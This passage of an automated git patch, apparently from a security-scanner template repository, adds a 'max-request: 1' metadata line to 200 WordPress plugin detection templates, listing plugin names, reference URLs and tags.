 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From b6f2c618e8421b22f8cac2e32a677a9bbaf508a7 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Thu, 28 Sep 2023 17:26:49 +0000
Subject: [PATCH 0583/1090] TemplateMan Update [Thu Sep 28 17:26:49 UTC 2023]
 :robot:

---
 http/technologies/wordpress/plugins/ad-inserter.yaml             | 1 +
 http/technologies/wordpress/plugins/add-to-any.yaml              | 1 +
 http/technologies/wordpress/plugins/admin-menu-editor.yaml       | 1 +
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml  | 1 +
 http/technologies/wordpress/plugins/akismet.yaml                 | 1 +
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml          | 1 +
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml     | 1 +
 http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml   | 1 +
 http/technologies/wordpress/plugins/amp.yaml                     | 1 +
 http/technologies/wordpress/plugins/antispam-bee.yaml            | 1 +
 http/technologies/wordpress/plugins/astra-sites.yaml             | 1 +
 http/technologies/wordpress/plugins/astra-widgets.yaml           | 1 +
 http/technologies/wordpress/plugins/autoptimize.yaml             | 1 +
 http/technologies/wordpress/plugins/backwpup.yaml                | 1 +
 http/technologies/wordpress/plugins/better-search-replace.yaml   | 1 +
 http/technologies/wordpress/plugins/better-wp-security.yaml      | 1 +
 .../wordpress/plugins/black-studio-tinymce-widget.yaml           | 1 +
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml        | 1 +
 http/technologies/wordpress/plugins/breeze.yaml                  | 1 +
 http/technologies/wordpress/plugins/broken-link-checker.yaml     | 1 +
 .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 +
 http/technologies/wordpress/plugins/classic-editor.yaml          | 1 +
 http/technologies/wordpress/plugins/classic-widgets.yaml         | 1 +
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml            | 1 +
 http/technologies/wordpress/plugins/cmb2.yaml                    | 1 +
 http/technologies/wordpress/plugins/coblocks.yaml                | 1 +
 http/technologies/wordpress/plugins/code-snippets.yaml           | 1 +
 http/technologies/wordpress/plugins/coming-soon.yaml             | 1 +
 http/technologies/wordpress/plugins/complianz-gdpr.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 +
 http/technologies/wordpress/plugins/contact-form-7.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml      | 1 +
 http/technologies/wordpress/plugins/cookie-law-info.yaml         | 1 +
 http/technologies/wordpress/plugins/cookie-notice.yaml           | 1 +
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml      | 1 +
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml     | 1 +
 http/technologies/wordpress/plugins/custom-css-js.yaml           | 1 +
 http/technologies/wordpress/plugins/custom-fonts.yaml            | 1 +
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml     | 1 +
 http/technologies/wordpress/plugins/disable-comments.yaml        | 1 +
 http/technologies/wordpress/plugins/disable-gutenberg.yaml       | 1 +
 http/technologies/wordpress/plugins/duplicate-page.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicate-post.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicator.yaml              | 1 +
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml       | 1 +
 http/technologies/wordpress/plugins/easy-fancybox.yaml           | 1 +
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml  | 1 +
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/elementor.yaml               | 1 +
 http/technologies/wordpress/plugins/elementskit-lite.yaml        | 1 +
 http/technologies/wordpress/plugins/enable-media-replace.yaml    | 1 +
 http/technologies/wordpress/plugins/envato-elements.yaml         | 1 +
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml   | 1 +
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml    | 1 +
 .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 +
 http/technologies/wordpress/plugins/fast-indexing-api.yaml       | 1 +
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml       | 1 +
 http/technologies/wordpress/plugins/flamingo.yaml                | 1 +
 http/technologies/wordpress/plugins/fluentform.yaml              | 1 +
 http/technologies/wordpress/plugins/font-awesome.yaml            | 1 +
 .../wordpress/plugins/force-regenerate-thumbnails.yaml           | 1 +
 http/technologies/wordpress/plugins/formidable.yaml              | 1 +
 http/technologies/wordpress/plugins/forminator.yaml              | 1 +
 http/technologies/wordpress/plugins/ga-google-analytics.yaml     | 1 +
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml  | 1 +
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml     | 1 +
 .../wordpress/plugins/google-analytics-for-wordpress.yaml        | 1 +
 http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 +
 http/technologies/wordpress/plugins/google-site-kit.yaml         | 1 +
 .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 +
 http/technologies/wordpress/plugins/gtranslate.yaml              | 1 +
 http/technologies/wordpress/plugins/gutenberg.yaml               | 1 +
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml  | 1 +
 .../wordpress/plugins/header-footer-code-manager.yaml            | 1 +
 http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 +
 http/technologies/wordpress/plugins/header-footer.yaml           | 1 +
 http/technologies/wordpress/plugins/health-check.yaml            | 1 +
 http/technologies/wordpress/plugins/hello-dolly.yaml             | 1 +
 http/technologies/wordpress/plugins/host-webfonts-local.yaml     | 1 +
 http/technologies/wordpress/plugins/imagify.yaml                 | 1 +
 http/technologies/wordpress/plugins/imsanity.yaml                | 1 +
 .../wordpress/plugins/insert-headers-and-footers.yaml            | 1 +
 http/technologies/wordpress/plugins/instagram-feed.yaml          | 1 +
 .../wordpress/plugins/intuitive-custom-post-order.yaml           | 1 +
 http/technologies/wordpress/plugins/iwp-client.yaml              | 1 +
 http/technologies/wordpress/plugins/jetpack-boost.yaml           | 1 +
 http/technologies/wordpress/plugins/jetpack.yaml                 | 1 +
 http/technologies/wordpress/plugins/kadence-blocks.yaml          | 1 +
 http/technologies/wordpress/plugins/kirki.yaml                   | 1 +
 http/technologies/wordpress/plugins/leadin.yaml                  | 1 +
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml         | 1 +
 http/technologies/wordpress/plugins/limit-login-attempts.yaml    | 1 +
 http/technologies/wordpress/plugins/litespeed-cache.yaml         | 1 +
 http/technologies/wordpress/plugins/loco-translate.yaml          | 1 +
 http/technologies/wordpress/plugins/loginizer.yaml               | 1 +
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml        | 1 +
 http/technologies/wordpress/plugins/mailpoet.yaml                | 1 +
 http/technologies/wordpress/plugins/maintenance.yaml             | 1 +
 http/technologies/wordpress/plugins/mainwp-child.yaml            | 1 +
 http/technologies/wordpress/plugins/malcare-security.yaml        | 1 +
 http/technologies/wordpress/plugins/megamenu.yaml                | 1 +
 http/technologies/wordpress/plugins/members.yaml                 | 1 +
 http/technologies/wordpress/plugins/meta-box.yaml                | 1 +
 http/technologies/wordpress/plugins/ml-slider.yaml               | 1 +
 http/technologies/wordpress/plugins/newsletter.yaml              | 1 +
 .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 +
 http/technologies/wordpress/plugins/nextgen-gallery.yaml         | 1 +
 http/technologies/wordpress/plugins/ninja-forms.yaml             | 1 +
 http/technologies/wordpress/plugins/ocean-extra.yaml             | 1 +
 http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 +
 http/technologies/wordpress/plugins/one-click-demo-import.yaml   | 1 +
 http/technologies/wordpress/plugins/optinmonster.yaml            | 1 +
 http/technologies/wordpress/plugins/otter-blocks.yaml            | 1 +
 http/technologies/wordpress/plugins/password-protected.yaml      | 1 +
 http/technologies/wordpress/plugins/pdf-embedder.yaml            | 1 +
 .../wordpress/plugins/pinterest-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/pixelyoursite.yaml           | 1 +
 http/technologies/wordpress/plugins/polylang.yaml                | 1 +
 http/technologies/wordpress/plugins/popup-builder.yaml           | 1 +
 http/technologies/wordpress/plugins/popup-maker.yaml             | 1 +
 http/technologies/wordpress/plugins/post-smtp.yaml               | 1 +
 http/technologies/wordpress/plugins/post-types-order.yaml        | 1 +
 .../wordpress/plugins/premium-addons-for-elementor.yaml          | 1 +
 http/technologies/wordpress/plugins/pretty-link.yaml             | 1 +
 http/technologies/wordpress/plugins/really-simple-captcha.yaml   | 1 +
 http/technologies/wordpress/plugins/really-simple-ssl.yaml       | 1 +
 http/technologies/wordpress/plugins/redirection.yaml             | 1 +
 http/technologies/wordpress/plugins/redux-framework.yaml         | 1 +
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml   | 1 +
 http/technologies/wordpress/plugins/safe-svg.yaml                | 1 +
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml        | 1 +
 http/technologies/wordpress/plugins/sg-cachepress.yaml           | 1 +
 http/technologies/wordpress/plugins/sg-security.yaml             | 1 +
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml     | 1 +
 .../wordpress/plugins/shortpixel-image-optimiser.yaml            | 1 +
 .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 +
 http/technologies/wordpress/plugins/siteguard.yaml               | 1 +
 http/technologies/wordpress/plugins/siteorigin-panels.yaml       | 1 +
 http/technologies/wordpress/plugins/smart-slider-3.yaml          | 1 +
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml       | 1 +
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml   | 1 +
 http/technologies/wordpress/plugins/sucuri-scanner.yaml          | 1 +
 http/technologies/wordpress/plugins/svg-support.yaml             | 1 +
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml  | 1 +
 http/technologies/wordpress/plugins/tablepress.yaml              | 1 +
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml    | 1 +
 http/technologies/wordpress/plugins/the-events-calendar.yaml     | 1 +
 http/technologies/wordpress/plugins/themeisle-companion.yaml     | 1 +
 http/technologies/wordpress/plugins/tinymce-advanced.yaml        | 1 +
 .../wordpress/plugins/translatepress-multilingual.yaml           | 1 +
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml         | 1 +
 http/technologies/wordpress/plugins/under-construction-page.yaml | 1 +
 http/technologies/wordpress/plugins/updraftplus.yaml             | 1 +
 http/technologies/wordpress/plugins/use-any-font.yaml            | 1 +
 http/technologies/wordpress/plugins/user-role-editor.yaml        | 1 +
 .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 +
 http/technologies/wordpress/plugins/w3-total-cache.yaml          | 1 +
 .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 +
 http/technologies/wordpress/plugins/webp-express.yaml            | 1 +
 .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 +
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml         | 1 +
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml         | 1 +
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml  | 1 +
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml     | 1 +
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml            | 1 +
 http/technologies/wordpress/plugins/woocommerce-payments.yaml    | 1 +
 .../wordpress/plugins/woocommerce-paypal-payments.yaml           | 1 +
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml          | 1 +
 http/technologies/wordpress/plugins/woocommerce-services.yaml    | 1 +
 http/technologies/wordpress/plugins/woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/wordfence.yaml               | 1 +
 http/technologies/wordpress/plugins/wordpress-importer.yaml      | 1 +
 http/technologies/wordpress/plugins/wordpress-seo.yaml           | 1 +
 http/technologies/wordpress/plugins/worker.yaml                  | 1 +
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml        | 1 +
 http/technologies/wordpress/plugins/wp-file-manager.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-google-maps.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml     | 1 +
 http/technologies/wordpress/plugins/wp-migrate-db.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml      | 1 +
 http/technologies/wordpress/plugins/wp-optimize.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-pagenavi.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-reset.yaml                | 1 +
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-rollback.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-seopress.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-smushit.yaml              | 1 +
 http/technologies/wordpress/plugins/wp-statistics.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-super-cache.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-user-avatar.yaml          | 1 +
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml         | 1 +
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml          | 1 +
 http/technologies/wordpress/plugins/wpforms-lite.yaml            | 1 +
 http/technologies/wordpress/plugins/wps-hide-login.yaml          | 1 +
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml   | 1 +
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml             | 1 +
 200 files changed, 200 insertions(+)

diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
+    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
+    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
+    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
+    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index f68ad2a6bf..ac77f4e5f5 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
+    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
+    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
+    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
+    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
+    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
+    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
+    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
+    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
+    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
+    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
+    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
+    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
+    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
+    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
+    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
+    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
+    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
+    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
+    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
